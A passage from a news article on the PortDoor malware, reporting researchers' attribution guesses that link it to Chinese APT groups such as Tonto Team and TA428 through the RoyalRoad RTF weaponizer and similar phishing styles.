However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by